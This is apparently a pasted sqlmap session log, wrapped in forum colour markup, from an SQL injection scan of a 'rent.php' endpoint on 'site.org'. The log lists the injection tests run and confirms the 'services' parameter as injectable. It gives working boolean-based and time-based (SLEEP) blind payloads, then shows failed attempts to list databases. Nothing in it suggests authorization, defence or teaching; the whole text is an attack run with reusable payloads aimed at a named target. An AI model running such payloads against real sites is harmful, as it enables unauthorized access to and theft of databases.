[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Oracle inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SQLite inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird inline queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]22[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]23[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL > 5.0.11 stacked queries (query SLEEP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL 8.1 stacked queries (comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL > 8.1 stacked queries'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]26[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]27[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'PostgreSQL 2.0 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]35[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SQLite > 2.0 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]36[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]36[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Firebird stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SAP MaxDB stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]37[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'SAP MaxDB stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]38[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 1.7.2 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 2.0 stacked queries (heavy query - comment)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'HSQLDB >= 2.0 stacked queries (heavy query)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]58[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]21[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]appears to be[/COLOR][COLOR="#DD0000"]'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'[/COLOR][COLOR="#0000BB"]injectable
it looks like the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS is[/COLOR][COLOR="#DD0000"]'MySQL'[/COLOR][COLOR="#007700"]. Do[/COLOR][COLOR="#0000BB"]you want to skip test payloads specific[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]other DBMSes[/COLOR][COLOR="#007700"]? [[/COLOR][COLOR="#0000BB"]Y[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]y
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 1 to 20 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]automatically extending ranges[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]UNION query injection technique tests[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]there is at least one other[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]potential[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]techni
que found
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]45[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]'ORDER BY'[/COLOR][COLOR="#0000BB"]technique appears to be usable[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]This should reduce the time needed to find the right number of query columns[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]A
utomatically extending the range[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]current UNION query injection technique test
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]47[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]target URL appears to have 1 column in query
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]49[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]] if[/COLOR][COLOR="#0000BB"]UNION based SQL injection is not detected[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]please consider[/COLOR][COLOR="#007700"]and/or try[/COLOR][COLOR="#0000BB"]to force the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]g[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'--dbms=mysql
'[/COLOR][COLOR="#007700"])
[[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]59[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]target URL appears to be UNION injectable with 1 columns
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 1 to 20 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 21 to 40 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]24[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 21 to 40 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]34[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 41 to 60 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]44[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 41 to 60 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]00[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]54[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 61 to 80 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]04[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 61 to 80 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (NULL) - 81 to 100 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]29[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]testing[/COLOR][COLOR="#DD0000"]'Generic UNION query (random number) - 81 to 100 columns'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]01[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]39[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]checking[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]the injection point on URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]is a false positive
URI parameter[/COLOR][COLOR="#DD0000"]'#1*'[/COLOR][COLOR="#0000BB"]is vulnerable[/COLOR][COLOR="#007700"]. Do[/COLOR][COLOR="#0000BB"]you want to keep testing the others[/COLOR][COLOR="#007700"](if[/COLOR][COLOR="#0000BB"]any[/COLOR][COLOR="#007700"])? [[/COLOR][COLOR="#0000BB"]y[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]N[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]n
sqlmap identified the following injection point[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]with a total of 364 HTTP[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]s[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]requests[/COLOR][COLOR="#007700"]:
---
[/COLOR][COLOR="#0000BB"]Parameter[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]#1* (URI)
[/COLOR][COLOR="#0000BB"]Type[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]boolean[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind
Title[/COLOR][COLOR="#007700"]: AND[/COLOR][COLOR="#0000BB"]boolean[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]WHERE[/COLOR][COLOR="#007700"]or[/COLOR][COLOR="#0000BB"]HAVING clause
Payload[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 2716=2716&timereset=2
[/COLOR][COLOR="#0000BB"]Type[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind
Title[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySQL[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]5.0.12[/COLOR][COLOR="#007700"]AND[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based blind[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]query SLEEP[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]Payload[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 1911 FROM (SELECT(SLEEP(
[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"])))[/COLOR][COLOR="#0000BB"]flbR[/COLOR][COLOR="#007700"])&[/COLOR][COLOR="#0000BB"]timereset[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2
[/COLOR][COLOR="#007700"]---
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]the back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS is MySQL
web application technology[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Nginx[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PHP
back[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]end DBMS[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]MySQL[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]5.0.12
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching database names
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]running in a single[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]thread mode[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Please consider usage of option[/COLOR][COLOR="#DD0000"]'--threads'[/COLOR][COLOR="#007700"]for[/COLOR][COLOR="#0000BB"]faster data retrieval
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]08[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]it is very important to not stress the network connection during usage of time[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]based payloads to prevent potential disr
uptions
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]WARNING[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]in[/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#0000BB"]of continuous data retrieval problems you are advised to[/COLOR][COLOR="#007700"]try[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]switch[/COLOR][COLOR="#DD0000"]'--no-cast'[/COLOR][COLOR="#007700"]or switch[/COLOR][COLOR="#DD0000"]'--hex'
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]ERROR[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the number of databases
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]falling back to current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]fetching current database
[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]11[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]INFO[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]retrieved[/COLOR][COLOR="#007700"]:
[[/COLOR][COLOR="#0000BB"]13[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]02[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]12[/COLOR][COLOR="#007700"]] [[/COLOR][COLOR="#0000BB"]CRITICAL[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#0000BB"]unable to retrieve the database names
